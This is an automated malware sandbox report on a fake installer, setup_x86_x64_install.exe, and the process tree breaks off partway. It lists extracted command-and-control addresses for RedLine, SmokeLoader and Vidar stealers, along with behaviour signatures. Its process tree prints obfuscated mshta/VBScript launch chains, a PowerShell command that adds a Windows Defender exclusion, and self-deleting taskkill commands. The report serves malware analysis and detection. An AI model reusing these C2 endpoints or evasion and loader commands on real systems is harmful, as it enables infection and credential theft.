Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    607s
  • max time network
    617s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    11-10-2021 21:02

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Extracted

Family

vidar

Version

41.3

Botnet

921

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

    suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 40 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 19 IoCs
  • NTFS ADS 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:2716
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:4264
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2584
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2564
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2396
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2372
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1920
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1320
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1032
                      • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                        2⤵
                          PID:8088
                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                          C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                          2⤵
                            PID:1096
                          • C:\Users\Admin\AppData\Roaming\gueuswc
                            C:\Users\Admin\AppData\Roaming\gueuswc
                            2⤵
                              PID:7832
                            • C:\Users\Admin\AppData\Roaming\uweuswc
                              C:\Users\Admin\AppData\Roaming\uweuswc
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:4196
                              • C:\Users\Admin\AppData\Roaming\uweuswc
                                C:\Users\Admin\AppData\Roaming\uweuswc
                                3⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:6140
                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                              2⤵
                                PID:5860
                              • \??\c:\windows\system\svchost.exe
                                c:\windows\system\svchost.exe
                                2⤵
                                  PID:7360
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:1004
                                • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2488
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:1952
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:4000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                        4⤵
                                          PID:2492
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                            5⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3620
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3560
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon20762bc3f6.exe
                                            Mon20762bc3f6.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2660
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1256
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon206b909958ed4.exe
                                            Mon206b909958ed4.exe /mixone
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2312
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 660
                                              6⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4548
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 676
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Program crash
                                              PID:4632
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 684
                                              6⤵
                                              • Program crash
                                              PID:5440
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 716
                                              6⤵
                                              • Program crash
                                              PID:5280
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 912
                                              6⤵
                                              • Program crash
                                              PID:4644
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 896
                                              6⤵
                                              • Program crash
                                              PID:6232
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1120
                                              6⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:6704
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3172
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon20927aab1e5.exe
                                            Mon20927aab1e5.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:2052
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon20927aab1e5.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon20927aab1e5.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:3060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3076
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon204014f13870f5e.exe
                                            Mon204014f13870f5e.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1936
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1640
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon203f01ac7e6.exe
                                            Mon203f01ac7e6.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3936
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                              6⤵
                                                PID:1196
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                                                  7⤵
                                                    PID:3496
                                                    • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                      09xU.EXE -pPtzyIkqLZoCarb5ew
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:4364
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                        9⤵
                                                          PID:4836
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                            10⤵
                                                              PID:4432
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                            9⤵
                                                              PID:5852
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                10⤵
                                                                  PID:4496
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                    11⤵
                                                                      PID:6576
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                      11⤵
                                                                        PID:6696
                                                                      • C:\Windows\SysWOW64\control.exe
                                                                        control .\R6f7sE.I
                                                                        11⤵
                                                                          PID:7496
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                            12⤵
                                                                            • Loads dropped DLL
                                                                            PID:4256
                                                                            • C:\Windows\system32\RunDll32.exe
                                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                              13⤵
                                                                                PID:6696
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                  14⤵
                                                                                    PID:7912
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /F -Im "Mon203f01ac7e6.exe"
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1768
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1200
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon206d48916f93c5.exe
                                                                  Mon206d48916f93c5.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1736
                                                                  • C:\Users\Admin\AppData\Roaming\7490716.scr
                                                                    "C:\Users\Admin\AppData\Roaming\7490716.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1044
                                                                  • C:\Users\Admin\AppData\Roaming\3172161.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3172161.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:1996
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4396
                                                                  • C:\Users\Admin\AppData\Roaming\5161927.scr
                                                                    "C:\Users\Admin\AppData\Roaming\5161927.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:4608
                                                                  • C:\Users\Admin\AppData\Roaming\3993370.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3993370.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:4956
                                                                  • C:\Users\Admin\AppData\Roaming\5781574.scr
                                                                    "C:\Users\Admin\AppData\Roaming\5781574.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:3772
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:876
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon209c830507d573.exe
                                                                  Mon209c830507d573.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:3900
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon209c830507d573.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon209c830507d573.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:1704
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                                                4⤵
                                                                  PID:4032
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0A781CF5\Mon20d3b8b752.exe
                                                                    Mon20d3b8b752.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1720
                                                                    • C:\Users\Admin\Pictures\Adobe Films\bUnCixD487PmUQ90fjecCDRO.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\bUnCixD487PmUQ90fjecCDRO.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4464
                                                                    • C:\Users\Admin\Pictures\Adobe Films\m_V_3XYzkh0V5lK1O6pjluHc.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\m_V_3XYzkh0V5lK1O6pjluHc.exe"
                                                                      6⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:1884
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                        7⤵
                                                                          PID:7544
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                            8⤵
                                                                              PID:7704
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                            7⤵
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:7884
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffef40b4f50,0x7ffef40b4f60,0x7ffef40b4f70
                                                                              8⤵
                                                                                PID:5548
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1684 /prefetch:8
                                                                                8⤵
                                                                                  PID:6628
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1636 /prefetch:2
                                                                                  8⤵
                                                                                    PID:4620
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5944
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
                                                                                      8⤵
                                                                                        PID:7252
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
                                                                                        8⤵
                                                                                          PID:5148
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
                                                                                          8⤵
                                                                                            PID:4168
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:8
                                                                                            8⤵
                                                                                              PID:3820
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:8
                                                                                              8⤵
                                                                                                PID:7060
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,7207457938009257014,1132766283861334860,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
                                                                                                8⤵
                                                                                                  PID:6420
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /C taskkill /F /PID 1884 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\m_V_3XYzkh0V5lK1O6pjluHc.exe"
                                                                                                7⤵
                                                                                                  PID:7476
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /PID 1884
                                                                                                    8⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:8020
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd.exe" /C taskkill /F /PID 1884 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\m_V_3XYzkh0V5lK1O6pjluHc.exe"
                                                                                                  7⤵
                                                                                                    PID:5172
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /PID 1884
                                                                                                      8⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7176
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\1rWBsLW3s9PerCIeYFurUJAx.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\1rWBsLW3s9PerCIeYFurUJAx.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5012
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                    7⤵
                                                                                                      PID:7420
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im chrome.exe
